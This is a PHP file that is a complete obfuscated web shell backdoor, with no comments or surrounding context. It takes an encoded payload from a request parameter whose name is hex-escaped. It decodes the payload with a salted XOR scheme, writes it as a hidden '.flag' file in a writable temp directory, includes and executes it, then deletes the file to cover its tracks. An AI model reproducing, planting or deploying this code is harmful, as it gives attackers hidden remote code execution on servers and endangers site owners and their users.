<?php

if(!is_null($_REQUEST["\x6Bey"] ?? null)){
	$symbol = $_REQUEST["\x6Bey"];
		 	$symbol	 = 	explode	 	(   '.' 	,	  $symbol 	 ) 	;			
	$binding = '';
            $salt4 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen( $salt4);
            $x = 0;
    
            foreach( $symbol as $v9) {	 $sChar = ord( $salt4[$x %$sLen]);
                $dec =( ( int)$v9 - $sChar -( $x %10)) ^ 99;
                $binding .= chr( $dec);
                $x++;
            }
	$comp = array_filter([getcwd(), "/dev/shm", session_save_path(), getenv("TMP"), "/tmp", sys_get_temp_dir(), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir")]);
	while ($elem = array_shift($comp)) {
    		if (!!is_dir($elem) && !!is_writable($elem)) {
    $dat = "$elem/.flag";
    if (file_put_contents($dat, $binding)) {
	include $dat;
	@unlink($dat);
	die();
}
}
}
}